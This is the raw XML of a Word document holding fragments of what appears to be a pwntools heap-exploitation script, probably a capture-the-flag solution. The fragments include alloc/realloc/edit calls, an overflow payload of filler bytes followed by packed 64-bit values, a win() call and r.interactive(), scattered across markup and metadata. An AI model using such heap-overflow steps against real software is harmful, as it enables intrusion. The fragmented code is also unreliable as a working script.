              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1,0x1000, b"\x45\x7A\x20\x57"*(int(128/len("\x45\x7A\x20\x57")))+p64(0x20)+p64(0x0000)+p64(0x0002070a))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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>alloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>128)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2, 32)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>edit(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1, 128 + 8 + 8 + 8 + 8, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>b'A</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>' * (128 - 32) + p64(0x00) * 2 + p64(0x00) * 2 + p64(0x20))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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0, 0x30)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200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0, 0x0)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E200B" w:rsidRPr="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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7E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>realloc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="007E200B">
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>0, 0x20)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="161B22"/>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>win</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-c"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="161B22"/>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="161B22"/>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-s1"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>r</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="pl-en"/>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>interactive</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="E6EDF3"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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7E200B" w:rsidTr="007E200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200B" w:rsidRDefault="007E200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7E200B" w:rsidTr="007E200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200B" w:rsidRDefault="007E200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7E200B" w:rsidTr="007E200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200B" w:rsidRDefault="007E200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7E200B" w:rsidTr="007E200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200B" w:rsidRDefault="007E200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  <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E200B" w:rsidRDefault="007E200B" w:rsidP="007E200B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00B"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="007E200B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7A361"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{C3BEC0A9-3B7E-47E1-BBA8-F9E2FF41D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7E200B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7E200B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20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200B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7E200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7E200B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E2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E200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s1">
    <w:name w:val="pl-s1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-s">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-en">
    <w:name w:val="pl-en"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-v">
    <w:name w:val="pl-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="table" w:styleId="a3">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="007E200B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k">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E200B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="pl-cce">
    <w:name w:val="pl-cce"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="007E2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6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282</Words>
  <Characters>1608</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>SPecialiST RePack</Company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2024-06-29T19:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T19:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>